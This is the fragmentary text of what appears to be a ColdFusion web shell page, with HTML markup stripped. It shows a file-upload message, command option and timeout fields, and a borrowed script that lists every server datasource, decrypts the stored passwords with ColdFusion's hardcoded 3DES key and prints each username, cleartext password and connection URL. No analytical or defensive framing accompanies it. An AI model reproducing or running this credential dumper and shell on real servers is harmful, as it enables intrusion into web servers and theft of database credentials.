
Your file has been uploaded.

Options: value="#form.opts#">
Timeout: value="#form.timeout#" value="5">
//The following code borrowed from hernanOchoa @hexale (thx) //added better formatting on output and connection string [lb] // Create Data Source Object dataSourceObb=createobject("java","coldfusion.server.ServiceFactory"). getDatasourceService().getDatasources(); writeoutput("

Datasource Credentials:
"); writeoutput(""); // Loop Through DataSources for(i in dataSourceObb) { if(len(dataSourceObb[i]["password"])){ // Get url theurl=(dataSourceObb[i]["url"]); // Get username username=(dataSourceObb[i]["username"]); // Get and decrypt password decryptPassword=Decrypt(dataSourceObb[i]["password"], generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64"); // Output datasource usernames, passwords, and urls writeoutput("" & "" & "" & ""); } } writeoutput("
DataSource: " & i & "Username: " & username & "Password: " & decryptPassword & "URL: " & theurl & "
